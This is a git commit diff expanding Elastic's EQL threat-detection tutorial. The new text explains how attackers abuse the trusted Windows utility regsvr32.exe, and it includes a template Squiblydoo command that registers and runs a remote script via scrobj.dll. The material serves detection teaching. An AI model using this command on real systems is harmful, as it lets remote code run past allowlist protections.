* [DOCS] EQL: Improve regsvr32 misuse explanation (#62722) Expands the introduction to better explain what regsvr32 misuse is and how it works at a high level. * [DOCS] EQL: Style fixes
This commit is contained in:
parent
9bf0d9105a
commit
00bfc2d684
|
@ -6,23 +6,37 @@
|
||||||
experimental::[]
|
experimental::[]
|
||||||
|
|
||||||
This example tutorial shows you how you can use EQL to detect security threats
|
This example tutorial shows you how you can use EQL to detect security threats
|
||||||
and other suspicious behavior.
|
and other suspicious behavior. In the scenario, you're tasked with detecting
|
||||||
|
https://attack.mitre.org/techniques/T1218/010/[regsvr32 misuse] in Windows
|
||||||
|
event logs.
|
||||||
|
|
||||||
In the scenario, you're tasked with detecting
|
`regsvr32.exe` is a built-in command-line utility used to register `.dll`
|
||||||
https://attack.mitre.org/techniques/T1218/010/[`regsvr32` misuse] in Windows event
|
libraries in Windows. As a native tool, `regsvr32.exe` has a trusted status in
|
||||||
logs. `regsvr32` misuse is a known adversary technique documented in the
|
Windows, letting it bypass most allowlist software and script blockers.
|
||||||
https://attack.mitre.org[MITRE ATT&CK®] knowledge base.
|
Attackers with access to a user's command line can use `regsvr32.exe` to run
|
||||||
|
malicious scripts using `.dll` libraries, even on machines that otherwise
|
||||||
|
disallow such scripts.
|
||||||
|
|
||||||
|
One common variant of regsvr32 misuse is a
|
||||||
|
https://attack.mitre.org/techniques/T1218/010/[Squiblydoo attack]. In a
|
||||||
|
Squiblydoo attack, a `regsvr32.exe` command uses the `scrobj.dll` library to
|
||||||
|
register and run a remote script. These commands often look like this:
|
||||||
|
|
||||||
|
[source,sh]
|
||||||
|
----
|
||||||
|
"regsvr32.exe /s /u /i:<script-url> scrobj.dll"
|
||||||
|
----
|
||||||
|
|
||||||
[discrete]
|
[discrete]
|
||||||
[[eql-ex-threat-detection-setup]]
|
[[eql-ex-threat-detection-setup]]
|
||||||
=== Setup
|
=== Setup
|
||||||
|
|
||||||
This tutorial uses a test dataset for `regsvr32` misuse from
|
This tutorial uses a test dataset for regsvr32 misuse from
|
||||||
https://github.com/redcanaryco/atomic-red-team[Atomic Red Team]. The dataset has
|
https://github.com/redcanaryco/atomic-red-team[Atomic Red Team]. The dataset has
|
||||||
been normalized and mapped to use fields from the {ecs-ref}[Elastic Common
|
been normalized and mapped to use fields from the {ecs-ref}[Elastic Common
|
||||||
Schema (ECS)], including the `@timestamp` and `event.category` fields. The
|
Schema (ECS)], including the `@timestamp` and `event.category` fields. The
|
||||||
dataset includes events that imitate behaviors related to `regsvr32` misuse, as
|
dataset includes events that imitate behaviors of a Squiblydoo attack, as
|
||||||
documented by MITRE ATT&CK®.
|
documented by the https://attack.mitre.org[MITRE ATT&CK®] knowledge base.
|
||||||
|
|
||||||
To get started, download and index the dataset:
|
To get started, download and index the dataset:
|
||||||
|
|
||||||
|
@ -58,9 +72,9 @@ yellow open my-index-000001 150
|
||||||
|
|
||||||
[discrete]
|
[discrete]
|
||||||
[[eql-ex-get-a-count-of-regsvr32-events]]
|
[[eql-ex-get-a-count-of-regsvr32-events]]
|
||||||
=== Get a count of `regsvr32` events
|
=== Get a count of regsvr32 events
|
||||||
|
|
||||||
Since you're looking for `regsvr32` misuse, start by getting a count of any
|
Since you're looking for regsvr32 misuse, start by getting a count of any
|
||||||
events associated with a `regsvr32.exe` process.
|
events associated with a `regsvr32.exe` process.
|
||||||
|
|
||||||
The following <<eql-search-api,EQL search API>> request uses an EQL query to
|
The following <<eql-search-api,EQL search API>> request uses an EQL query to
|
||||||
|
@ -112,11 +126,11 @@ query.
|
||||||
[[eql-ex-check-for-command-line-artifacts]]
|
[[eql-ex-check-for-command-line-artifacts]]
|
||||||
=== Check for command line artifacts
|
=== Check for command line artifacts
|
||||||
|
|
||||||
Based on your previous query, you know `regsvr32` processes were associated with
|
Based on your previous query, you know regsvr32 processes were associated with
|
||||||
143 events. But how was `regsvr32.exe` first called? And who called it?
|
143 events. But how was `regsvr32.exe` first called? And who called it?
|
||||||
|
|
||||||
`regsvr32` is a command-line utility so it may help to narrow your results to
|
`regsvr32.exe` is a command-line utility so it may help to narrow your results
|
||||||
processes where the command line was used.
|
to processes where the command line was used.
|
||||||
|
|
||||||
Update the previous EQL query as follows:
|
Update the previous EQL query as follows:
|
||||||
|
|
||||||
|
@ -144,8 +158,7 @@ The query matches one process event. The event has an `event.type` of
|
||||||
|
|
||||||
Based on the `process.command_line` value in the response, `regsvr32.exe` used
|
Based on the `process.command_line` value in the response, `regsvr32.exe` used
|
||||||
`scrobj.dll` to register a script, `RegSvr32.sct`. This fits the behavior of a
|
`scrobj.dll` to register a script, `RegSvr32.sct`. This fits the behavior of a
|
||||||
https://attack.mitre.org/techniques/T1218/010/["Squiblydoo" attack], a known
|
Squiblydoo attack.
|
||||||
variant of `regsvr32` misuse.
|
|
||||||
|
|
||||||
The response also includes other valuable information about how the
|
The response also includes other valuable information about how the
|
||||||
`regsvr32.exe` process started, such as the `@timestamp`, the associated
|
`regsvr32.exe` process started, such as the `@timestamp`, the associated
|
||||||
|
|
Loading…
Reference in New Issue